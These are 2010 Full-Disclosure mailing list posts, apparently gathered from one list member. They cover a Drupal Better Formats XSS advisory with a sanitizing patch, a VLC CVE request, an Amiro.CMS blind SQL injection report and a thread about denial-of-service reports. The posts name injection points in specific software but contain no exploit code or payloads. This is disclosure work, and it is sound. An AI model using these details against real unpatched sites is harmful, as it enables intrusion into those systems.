> Drupal (http://drupal.org) is a robust content management system (CMS)
> written in PHP and MySQL.  The Drupal Better Formats module
> (http://drupal.org/project/better_formats) contains a cross site
> scripting (XSS) vulnerability due to the fact that it fails to
> sanitize format names before display.
> 
> Systems affected:
> - -
> Drupal 6.16 with Better Formats 6.x-1.2 was tested and shown to be
> vulnerable
> 
> Impact
> - --
> User could inject arbitrary scripts into pages affecting site users.
> This could result in administrative account compromise leading to web
> server process compromise.
> 
> Mitigating factors:
> - ---
> In order to execute arbitrary script injection malicious users must
> have 'Administer filters' permission.  The Drupal security team has
> classified vulnerabilities that require this permission
> (http://drupal.org/node/475848) as "display bugs" because access to
> this permission allows for alteration of input specifications that
> could allow users with permissions to create content to craft
> arbitrary PHP. However, in a situation where a user had "administer
> filters" permission but could not create content this vulnerability
> could be used to attack other Drupal users.
> 
> Patch:
> - --
> Applying the following patch mitigates this issue in version 6.x-1.2.
> 
> - --- better_formats/better_formats.module2010-02-05
> 08:59:18.0 -0500
> +++ better_formats/better_formats.module  2010-04-27
> 11:35:53.444189426 -0400 @@ -537,7 +537,7 @@ function
> better_formats_filter_form($val
> 
>  $form = array(
>'#type' => 'fieldset',
> - -  '#title' => $fieldset_title,
> +  '#title' => check_plain($fieldset_title),
>'#collapsible' => $collapsible,
>'#collapsed' => $collapsed,
>'#weight' => $weight,
> @@ -551,7 +551,7 @@ function better_formats_filter_form($val
>$parents_for_id = array_merge($parents,
> array($format->format)); $form[$format->format] = array(
>  '#type' => 'radio',
> - -'#title' => $format->name,
> +'#title' => check_plain($format->name),
>  '#default_value' => $default,
>  '#return_value' => $format->format,
>  '#parents' => $parents,
> 
> - -- 
> Justin C. Klein Keane
> http://www.MadIrish.net
> 
> The digital signature on this message can be confirmed
> using the public key at http://www.madirish.net/gpgkey
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.10 (GNU/Linux)
> Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/
> 
> iPsEAQECAAYFAkvXC7UACgkQkSlsbLsN1gAYFQb4mjTDJY/6KP2JQIv0pK9H/20s
> g/+dwvKFc78AQMMKqDzi3rfqF4L+RzE6bHPsKHmN7yWIxIGMccbL13rOAvarEzgZ
> jYyfC24Lbhla38p4JkwWltxPNgsH10wXLGdv+BsiFp8oZUpuAQez0N0SNxhr1mX5
> rzZ0fgBEQm7WMmgH9qyLdso1erEQ5sLgPmED5dsaYK2Z2QHBgN19Ed0P1iEZpTdy
> anFseTfo00Uts6zOd3loQ/ZeaAOAnYFZwunOtHVurFPyWpAaM1DGVAOHHWtR265d
> jQMygOdRmQ5qtV/HpA==
> =z0IC
> -END PGP SIGNATURE-

Have you requested CVE-identifier for this vulnerability?

---
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CVE request: VLC <1.0.6 Multiple issues

[Henri Salo]

FYI:

Begin forwarded message:

Date: Thu, 22 Apr 2010 20:30:33 +0200
From: Alex Legler 
To: oss-secur...@lists.openwall.com
Subject: [oss-security] CVE request: VLC <1.0.6 Multiple issues


Hi,

in case there was no request from upstream yet:

VLC media player suffers from various vulnerabilities when attempting
to parse malformatted or overly long byte streams.

* Heap buffer overflow vulnerability in A/52, DTS and MPEG Audio
  decoders
* Invalid memory access in AVI, ASF, Matroska (MKV)
  demuxers 
* Invalid memory access in XSPF playlist parser
* Inavlid memory access in ZIP archive decompressor
* Heap buffer overflow in RTMP access

http://www.videolan.org/security/sa1003.html

Thanks,
Alex

-- 
Alex Legler | Gentoo Security / Ruby
a...@gentoo.org | a...@jabber.ccc.de

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Amiro.CMS <= 5.4.4 SQL inj

[Henri Salo]

On Thu, 22 Apr 2010 21:20:26 +0400
Владимир Воронцов  wrote:

> No.
> 
> On Thu, 22 Apr 2010 18:35:48 +0300, Henri Salo  wrote:
> > On Thu, 22 Apr 2010 09:52:26 +0400
> > Владимир Воронцов  wrote:
> > 
> >> In the system of site management Amiro.CMS found a critical
> >> vulnerability introduction operators database. The vulnerability
> >> allows an attacker, in particular, to compromise a target system,
> >> gain administrative access.
> >> 
> >> Vulnerability has been discovered introduction of operators
> >> database at user registration. An attacker can fill in the
> >> "signature in the forum" with special data and affect the
> >> structure of the query to the DBMS. Information about the request
> >> not be displayed on the screen, thus possibly
> >> 
> >> conduct "blind" injections in order to obtain data or injections in
> >> order to displace the data. Injection takes place in the operator
> >> database INSERT. Further details were not disclosed at the request
> >> of the developer.
> >> 
> >> Original at Russian: http://onsec.ru/vuln?id=20
> > 
> > Have you requested CVE-identifier for this?
> > 
> > ---
> > Henri Salo
> 

Please do: http://cve.mitre.org/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Amiro.CMS <= 5.4.4 SQL inj

[Henri Salo]

On Thu, 22 Apr 2010 09:52:26 +0400
Владимир Воронцов  wrote:

> In the system of site management Amiro.CMS found a critical
> vulnerability introduction operators database. The vulnerability
> allows an attacker, in particular, to compromise a target system,
> gain administrative access.
> 
> Vulnerability has been discovered introduction of operators database
> at user registration. An attacker can fill in the "signature in the
> forum" with special data and affect the structure of the query to the
> DBMS. Information about the request not be displayed on the screen,
> thus possibly
> 
> conduct "blind" injections in order to obtain data or injections in
> order to displace the data. Injection takes place in the operator
> database INSERT. Further details were not disclosed at the request of
> the developer.
> 
> Original at Russian: http://onsec.ru/vuln?id=20

Have you requested CVE-identifier for this?

---
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Insufficient Anti-automation and Denial of Service vulnerabilities in multiple systems

[Henri Salo]

On Tue, 13 Apr 2010 21:35:30 -0700
Kaddeh  wrote:

> First off, I am curious how many of the developers responded to your
> notification to them about these vulnerabilities.
> Secondly, just a thought, if you are testing a piece of obscure
> software, at least try and link to their site/repo or whatever.
> Third, if all of these CMS vulns that you are finding are true, I am
> assuming that they are possible, why are you testing CMS software
> that was last updated 2 years ago like HoloCMS (at least, without
> proper links to home pages, I can't tell short of doing a Google
> search). Additionally, I would assume that you tested these on a
> machine that you yourself have, specs of this machine would be nice,
> I know that I have seen several vulns come through that can be
> reproduced, but you have to have a very select configuration (ie,
> document.write "bugs" that only fail on 32-bit, VM issues with VT-x
> on 32-bit, etc)
> 
> Cheers
> 
> Kad

Two year old release might still be vulnerable. That should tell
people a lot about the state of overall security. I still can't figure
out why MustLive doesn't request CVE-numbers.

I also beleive there might be none to zero automated security testing
for these not-so-known CMS-softwares.

---
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/